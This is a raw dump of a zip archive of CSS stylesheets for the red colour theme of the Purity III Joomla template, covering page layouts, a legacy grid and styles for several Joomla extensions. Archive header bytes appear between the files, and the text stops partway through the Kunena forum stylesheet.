.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-right: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKӜ�\4purity_iii/css/themes/red/layouts/features-intro.cssnu&1i�PKӜ�\�!<��*purity_iii/css/themes/red/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-right: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  .blog .blog-item .item-image.pull-left {
    float: none !important;
  }
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #800000;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKӜ�\��M�.purity_iii/css/themes/red/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #cc0000;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  right: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKӜ�\�	�	)purity_iii/css/themes/red/legacy-grid.cssnu&1i�.row-flex {
  display: flex;
  flex-wrap: wrap;
  align-items: stretch;
}
.row-fluid {
  margin-right: -20px;
  margin-left: -20px;
}
[class*="span"] {
  float: left;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-left: 100%;
}
.offset11 {
  margin-left: 91.66666667%;
}
.offset10 {
  margin-left: 83.33333333%;
}
.offset9 {
  margin-left: 75%;
}
.offset8 {
  margin-left: 66.66666667%;
}
.offset7 {
  margin-left: 58.33333333%;
}
.offset6 {
  margin-left: 50%;
}
.offset5 {
  margin-left: 41.66666667%;
}
.offset4 {
  margin-left: 33.33333333%;
}
.offset3 {
  margin-left: 25%;
}
.offset2 {
  margin-left: 16.66666667%;
}
.offset1 {
  margin-left: 8.33333333%;
}
.offset0 {
  margin-left: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKӜ�\��P=OO1purity_iii/css/themes/red/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-left: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: left;
  margin: 0;
  margin-right: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 10px 10px 0;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-left: 1px solid #eeeeee;
  margin-left: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #cc0000;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #cc0000;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 20px 0 0;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 20px 20px 0 !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .right .cart div input[type="text"],
.com_mijoshop .product-info .right .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .right .cart div input[type="text"] {
  padding-left: 5px;
  padding-right: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
  padding: 10px 10px 10px 0;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKӜ�\=[����3purity_iii/css/themes/red/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-left: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKӜ�\���|qq4purity_iii/css/themes/red/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: left;
  margin: 0 1px 10px 0;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #cc0000;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #cc0000;
  text-decoration: none;
}PKӜ�\�y���1purity_iii/css/themes/red/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 10px 5px 0;
  display: inline-block;
  line-height: normal !important;
}PKӜ�\*�ن>>2purity_iii/css/themes/red/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-right: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-left: 15px;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-left: 20px;
}PKӜ�\BL���4purity_iii/css/themes/red/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-left: 0;
  margin-right: 0;
}PKӜ�\+e���4purity_iii/css/themes/red/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKӜ�\�	�o�o/purity_iii/css/themes/red/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout input[type="checkbox"] {
  height: auto;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #cc0000;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-right: 3px;
  margin-left: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #cc0000;
  box-shadow: none;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #cc0000;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-right: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #cc0000;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #cc0000;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-right: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
  left: auto;
  right: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu select,
#kunena.layout .navbar .mobile-user .dropdown-menu textarea,
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="text"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="password"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime-local"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="date"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="month"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="time"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="week"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="number"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="email"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="url"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="search"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="tel"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="color"],
#kunena.layout .navbar .mobile-user .dropdown-menu .inputbox {
  width: auto;
  display: inline-block;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #cc0000;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-right: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  left: auto;
  right: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #800000;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #cc0000;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-right: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-right: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-left: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: left;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: left;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #800000;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
